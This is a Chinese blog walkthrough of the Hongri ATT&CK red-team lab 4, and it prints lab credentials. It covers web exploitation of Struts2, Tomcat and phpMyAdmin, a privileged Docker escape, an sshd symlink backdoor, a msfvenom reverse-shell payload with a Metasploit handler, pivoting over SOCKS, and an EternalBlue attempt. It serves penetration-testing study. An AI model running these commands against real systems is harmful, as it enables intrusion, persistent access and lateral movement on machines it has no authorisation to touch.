0%

红日靶场4

红日靶场4

1
说实话也好久没有打靶场了,这次也来继续打红日靶场过下瘾,因为前段时间一直在研究免杀。

环境搭建

红日ATT&CK系列靶场(四)搭建_哔哩哔哩_bilibili

1
2
3
4
5
6
7
8
9
ubuntu:ubuntu域成员机器
douser:Dotest123
DC:administrator:Test2008 ——>123qwe!@#

利用自定义来实现两个网段
web:192.168.183.133 192.168.100.145
域成员:192.168.183.129
域控:192.168.183.130

1
2
3
4
5
6
7
8
9
10
11
12
大家好红日安全红队靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。
靶场学习路径,可参考
strusts漏洞利用
phpmyadmin getshell
tomcat 漏洞利用
docker逃逸
ms14-068
ssh密钥利用
流量转发
历史命令信息泄露
域渗透

web的docker打开

1
2
3
4
5
6
7
8
9
10
11
cd /home/ubuntu/Desktop/vulhub/struts2/s2-045

sudo docker-compose up -d

cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/

sudo docker-compose up -d

cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613/

sudo docker-compose up -d

win7不知道烦什么毛病啊

外网打点

getshell

192.168.157.128

这个是目标地址,首先我们扫一扫端口,根据官方的提示应该是有三种方式拿下shell的,strusts漏洞利用
phpmyadmin getshell,tomcat 漏洞利用

image-20221018140821496

分别对应了strusts漏洞利用,phpmyadmin getshell,tomcat 漏洞利用。

第一个structs我直接用的工具啊(后面我会专门写文章从与原理分析

image-20221018141250527

Tomcat任意文件上传漏洞

image-20221018141704684

image-20221018141731988

phpmyadmin我就不用说了吧,我写的有博客 phpmyadmin后台拿shell的4种方式 | 十三の博客 (wanheiqiyihu.top)

docker逃逸

1
2
3
4
5
6
7
8
9
10
11
首先查看是否是在docker环境中
我这里找了网上的三种方法:
方式一:检查/.dockerenv文件是否存在
ls -al /

方式二:检查是否存在container环境变量(感觉不是很靠谱)
env
export

方式三:检查/proc/1/cgroup内是否包含"docker"等字符串
cat /proc/1/cgroup

image-20221018143121636

image-20221018143214298

确定当前为docker环境,进行docker逃逸。

这是我第一次接触docker逃逸,这里就想跟着大佬做,后面出文章总结一下docker逃逸的原理和方法(挖坑)。

利用特权模式逃逸

如果是通过特权模式启动容器,就可以获得大量设备文件的访问权限,因为管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。

创建一个文件夹,将宿主机根目录挂载至容器目录下

1
2
3
fdisk -l   #linux中通过fdisk -l 查看机器所挂硬盘个数及分区情况
mkdir /wpsec
mount /dev/sda1 /wpsec

进入这个创建的文件夹,发现可以修改其中的内容,在相同版本的ubuntu创建一个root权限的用户,然后复制进去。当然也要改shadow

(111条消息) 记录ubuntu建立新用户并赋予root权限_早睡早起不偷懒!的博客-CSDN博客_ubuntu创建用户并赋予权限

然后就ssh连接

1
ssh wanheiqiyihu@192.168.157.128

这里我们把ubuntu也弄成root权限,这样才能设置root的密码

image-20221018154456136

提权

image-20221018154503663

权限维持

用ssh软连接后面进行权限维持

1
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345

要连接的时候

1
ssh root@192.168.100.145 -p 12345

任意密码登录

内网渗透

生成一个木马文件,然后上线msf

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.100.129 LPORT=9995 -f elf > shell.elf

开始监听

1
2
3
4
5
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost
set lport
run

有点慢啊,弄得我都怀疑是命令哪里出错了,结果是之前环境错了,连不了外网,我把另一个网卡改成nat模式了。

这样就可以连接了

image-20221018160555552

1
2
run get_local_subnets
拿到网段

image-20221018172820577

配置转发

run autoroute -s 192.168.183.0/24

socks代理

1
2
3
4
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set version 5
set srvport 3333

image-20221018181409165

1
vi /etc/proxychains.conf

修改好

image-20221018180641370

1
proxychains msfconsole 

漏洞扫描

在ubuntu上弄个fscan

1
./fscan_amd64 -h 192.168.183.0/24

image-20221018173637502

两个ms17-010

1
2
3
4
search ms17_010
use 2
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.183.130

额,给打蓝屏了还是没利用成功?(不愧是永恒之蓝?

image-20221018184853720

image-20221018185022560

这环境也太不稳了。

暂时这样吧,后面单独复现永恒之蓝,电脑要卡死了。

后面就是永恒之蓝,然后MS14-068抓密码